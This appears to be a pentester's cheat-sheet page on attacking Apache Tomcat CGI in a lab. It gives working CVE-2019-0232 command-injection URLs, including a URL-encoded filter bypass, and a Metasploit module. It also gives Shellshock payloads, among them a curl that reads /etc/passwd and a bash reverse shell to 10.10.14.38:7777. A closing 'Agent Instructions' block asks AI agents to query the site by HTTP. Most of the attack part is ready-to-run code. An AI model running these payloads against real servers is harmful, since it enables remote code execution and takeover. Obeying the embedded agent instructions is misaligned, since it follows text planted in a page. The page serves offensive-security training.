# Tomcat CGI ## Enumeration ```shell-session $ nmap -p- -sC -Pn 10.129.204.227 --open Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 13:57 SAST Nmap scan report for 10.129.204.227 Host is up (0.17s latency). Not shown: 63648 closed tcp ports (conn-refused), 1873 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 2048 ae19ae07ef79b7905f1a7b8d42d56099 (RSA) | 256 382e76cd0594a6e717d1808165262544 (ECDSA) |_ 256 35096912230f11bc546fddf797bd6150 (ED25519) 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 5985/tcp open wsman 8009/tcp open ajp13 | ajp-methods: |_ Supported methods: GET HEAD POST OPTIONS 8080/tcp open http-proxy |_http-title: Apache Tomcat/9.0.17 |_http-favicon: Apache Tomcat 47001/tcp open winrm Host script results: | smb2-time: | date: 2023-03-23T11:58:42 |_ start_date: N/A | smb2-security-mode: | 311: |_ Message signing enabled but not required Nmap done: 1 IP address (1 host up) scanned in 165.25 seconds ``` ## **Finding a CGI script** {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ### **Fuzzing Extentions - .CMD** ```shell-session ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.cmd ``` ### **Fuzzing Extentions - .BAT** ```shell-session ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat ``` ## Exploitation ### RCE Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 `CVE-2019-0232` - append our own commands through the use of the batch command separator `&` {% hint style="info" %} Start by [fuzzing .bat to find a valide ](#fuzzing-extentions-.bat)file even if /cgi is 404 {% endhint %}

``` http://10.129.204.227:8080/cgi/welcome.bat?&dir ``` ```http # http://10.129.204.227:8080/cgi/welcome.bat?&set Welcome to CGI, this section is not functional yet. Please return to home page. AUTH_TYPE= COMSPEC=C:\Windows\system32\cmd.exe CONTENT_LENGTH= CONTENT_TYPE= GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5 HTTP_HOST=10.129.204.227:8080 HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC PATH_INFO= PROMPT=$P$G QUERY_STRING=&set REMOTE_ADDR=10.10.14.58 REMOTE_HOST=10.10.14.58 REMOTE_IDENT= REMOTE_USER= REQUEST_METHOD=GET REQUEST_URI=/cgi/welcome.bat SCRIPT_FILENAME=C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi\welcome.bat SCRIPT_NAME=/cgi/welcome.bat SERVER_NAME=10.129.204.227 SERVER_PORT=8080 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=TOMCAT SystemRoot=C:\Windows X_TOMCAT_SCRIPT_PATH=C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi\welcome.bat ``` PATH not set - use full path Apache Tomcat introduced a patch that utilises a regular expression to prevent the use of special characters. However, the filter can be bypassed by URL-encoding the payload. ``` http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe ``` #### Metasploit ``` use exploit/windows/http/tomcat_cgi_cmdlineargs ```

#### References {% embed url="" %} {% embed url="" %} ### Shellshock via CGI #### Detection ``` nmap -sV -p- --script http-shellshock nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls ``` {% embed url="" %} #### Exploit ```shell-session env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable" ``` ```shell-session gobuster dir -u http://10.129.204.231/cgi-bin/ -w /usr/share/dirb/wordlists/small.txt -x cgi ``` ```shell-session curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.129.204.231/cgi-bin/access.cgi ``` #### Reverse Shell ```shell-session curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1' http://10.129.204.231/cgi-bin/access.cgi ``` {% embed url="" %} ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

## Interesting Books {% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %} [Interesting Books](/0xss0rz/interesting-books.md) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more * [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them * [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/tomcat-cgi.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.